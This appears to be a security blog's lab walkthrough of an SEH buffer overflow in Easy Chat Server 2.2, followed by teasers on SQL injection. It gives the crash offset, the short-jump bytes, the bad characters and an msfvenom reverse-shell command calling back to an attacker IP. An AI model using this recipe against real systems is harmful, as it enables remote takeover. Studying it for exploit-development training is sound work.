Skip to main content

Easy Chat Server 2.2 ( Authentication SEH BOF)

 A SEH stack overflow vulnerability exists in the Easy Chat Server 2.2 authentication method through which we can send malicious data in the user and pass parameter which stores in the stack as the input uses SEH to manage the exception. We an exploit for this application from scratch to a fully working exploit which gives reverse shell of the victim's machine remotely.


Structured Exception Handler (SEH)

An exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control.


Structured exception handling is a mechanism for handling both hardware and software exceptions. Therefore, your code will handle hardware and software exceptions identically. Structured exception handling enables you to have complete control over the handling of exceptions, provides support for debuggers, and is usable across all programming languages and machines. Vectored exception handling is an extension to structured exception handling.


The system also supports termination handling, which enables you to ensure that whenever a guarded body of code is executed, a specified block of termination code is also executed.


Buffer Overflow with SEH

If an application is working with SEH, then, our simple buffer overflow with EIP overwriting will not work, as, the SEH converts all the data into zero to stop the exploiter from injecting their codes in the program. We also need to check the bad characters in the program which will terminates the execution of our shell_code. This can be done by sending all possible hex vaiables.


But, there is also a vulnerability available in the SEH, as, we now working by changing the Exception Handler location instead of EIP. We sends the bunch of junk data into the program memory and follow the SEH Chain for the corruption or breaking in the chain of the EH. Then, find out the linkage file without the SAFE SEH for the POP POP RETN sequence. Then, we overwrite the next ERR pointer with '\xEB\x06\x90\x90' to jump over the EH pointer directly to our shell_code.



Scenario

Attacker's Machine : Kali Linux 19.1

Victim's Machine : Windows XP PRO SP3

VulnApp : Easy Chat Server 2.2


Walkthrough


So, our exploitation part begins. We installed our vulnerable application in our Windows machine and Immunity Debugger to debug our application during the running process of the program.


We started our Immunity Debugger and open our application for the complete view on the background processes done by the application or checks the behaviour of the application when we try to exploit it.


We run the application in the debugger and it makes it in the initial state of the program.


As this is the Remote Buffer Overflow, we use our Attacker's Machine to create the remote working exploit. We gather the required header information used by the program and creates a buffer of the continuous pattern of 'A' of 2000. Then, sends the data to the program by running the exploit.


After the completion of the exploit, our program stopped at the Access violation error while accessing the load of A's in the program.


Now, check the SEH chain of the program at the current state and it shows that it is broken and overwritten with our 'A'. It seems to be more interesting as we now need to use SEH for the code execution.


Follow the SEH in the stack, it shows us that all the pointers is overwritten with our load of 'A'. The EH and ERR pointer is also written with our junk data.


Now, we use msf-pattern_create to create a continuous string of dissimilar data to check the offset of the EH part.


We restart the program and run our exploit and sends random junk to the program and checks the SEH chain again. Its again corrupted but with some random string.


Again follows the SEH in the stack and got random strings to check for the offset.


We use msf-pattern_offset to check the offset length by query the random string from the stack. We found offset length as 216.


Now to verify our query, we create a string of A's of length 216, B of length 4, C of length 4 and 'A' of length of 2000 as junk data.


Again restart the program and run the exploit. Checks the SEH chain and again its corrupted, but this time, it is corrupted with the location of the 4 C's. Follows the SEH in stack and got EH is written with C and ERR is written with B.


Now, we need to find the linked file location without SAFE SEH protection. We used pvefindaddr tool in Immunity Debugger to find it using command '!pvefindaddr nosafeseh'. This gives us 3 linked file address with nosafeseh at the current state and we need to choose the linked file which location start without bad characters like '\x00'. We used the first one.


Restart the program in debugger, and load the linked file using Executable Modules options in the Debugger. We need to find the POP POP RETN sequence in the file.


Use search of command sequence option to search the sequence as:

-------------------------------

pop r32

pop r32

retn

-------------------------------


Use CTRL+L to search for next to find out the sequence location which doesn't contain any bad chars like '\x00'. We found a sequence whose memory location doesn't contain any bad chars.


We added the location at the location of C in the little endian form and '\xEB\x06\x90\x90' in the location of the B.


Now, we need to find out the bad characters in the program which terminates the program execution. We load the complete sequence of hex values and send it to the program to check the bad characters which breaks the hex sequence.


After the successful method of finding the bad characters in the program, we found the bad chars:

\x00\x0a\x0d\x20


Now, we can move to the payload creation for the reverse shell of the victim's machine. We use msfvenom to create the one:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.133.145 lport=4444 -f python -a x86 -b "\x00\x0a\x0d\x20"


We added the payload to the exploit at the location of junk data at the end of the buffer of size 2000.


Now run the program without the debugger to run as a regular program.


As soon as we start listener and run the exploit code, we got a reverse shell of the victim's machine.


References

https://docs.microsoft.com/en-us/windows/desktop/debug/structured-exception-handling

https://github.com/matrixhacker0001/buffer_overflow/blob/master/exploits/Easy%20Chat%20Server%202.2%20-%20Authentication%20Buffer%20Overflow.py

https://github.com/matrixhacker0001/buffer_overflow/blob/master/bad_char%20buffer%20overflow%20list 


Comments

Popular posts from this blog

Read About Blind SQL Injection (Blind SQLi)

  What we know so far If you've read the above three tutorials, you know the basic theory of what SQL Injection is, you know how to carry it out using you web browser on a vulnerable website, and you know how to use SQLMap to automate some of the process. Now, for revision's sake, what we did in the Manual SQL injection tutorial was- Found a potentially vulnerable website ( http://testphp.vulnweb.com ) Used the asterisk  ( ' ) to verify vulnerability. Found out the number of rows and columns by making some small changes to the URL (which eventually changes the query that is executed on the server) We then obtained names of tables, their columns, and finally extracted data. However, it is worth noting that the website was intentionally left vulnerable, and most often the flaws in security aren't this obvious. In our case, the website was willingly responding to our queries with errors. This may not always be the case. As long as we can see the errors, we know we're g

Basics of SQLi

  Before we see what  SQL Injection is. We should know what SQL and Database are. Database: Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more. Some List of Database are: * DB servers, * MySQL(Open source),  * MSSQL,  * MS-ACCESS,  * Oracle,  * Postgre SQL(open source),  * SQLite, SQL: Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language. Definition from Complete reference: SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name “SQL” is an abbreviation for Structured Query Language. For historical reasons, SQL is usually pronounced “sequel,” but the alternate pronunciation “S.Q.L.” is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called